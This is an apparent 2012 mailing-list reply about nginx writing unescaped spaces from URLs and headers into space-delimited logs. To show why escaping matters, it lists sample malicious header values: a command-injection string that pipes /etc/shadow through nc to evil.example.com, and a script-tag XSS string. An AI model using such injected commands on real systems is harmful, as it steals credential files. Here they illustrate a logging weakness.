On Thu, May 10, 2012 at 7:57 AM, Andrew Otto <otto(a)wikimedia.org> wrote:
Diederik just asked me to check if I could reproduce
the problem of spaces
in logs for a request like this:
https://en.m.wikipedia.org/wiki/Extensor_carpi radialis longus
Answer: nginx does not escape the spaces in the url.
But don't blame nginx! nginx is just being honest! The HTTP header had
spaces in it, so it printed the spaces to the log file. I think nginx did
exactly what it was supposed to. As David pointed out, it is allowed to
have any whitespace (even newlines) in an HTTP header. Shouldn't the
loggers just output what they see?
No, nginx should print that output in a context-appropriate fashion.
Fun possible http header fields:
" ; cat /etc/shadow | nc
evil.example.com 80
<javascript>alert('whee!');</javascript>
Now, that's not to say that it's likely that we have vulnerabilities
in these areas. However, context matters, and printing spaces in a
space-delimited file is ...um... suboptimal.
It looks like the default for nginx is space-delimited, but to put
quote marks around user input:
http://wiki.nginx.org/HttpLogModule
...which is a pretty fragile strategy (though perhaps less fragile
than not putting quote marks as we do).
I agree with Andrew that we shouldn't maintain a patched version of
nginx logging code. However, if we submitted a patch for optionally
escaping spaces in header fields, it seems pretty plausible that it'd
be accepted.
Using tabs as the delimiter wouldn't solve the
problem for ALL cases. It is
possible to put tabs in headers, (right?). But for 99.999999% (that is a
statistically researched number, don't question it) of cases, using tabs as
delimiter would solve this problem.
I suppose this would be fine. I would recommend, though, making sure
we contact everyone listed as contacts in the filters list on locke,
emery, and oxygen.
Rob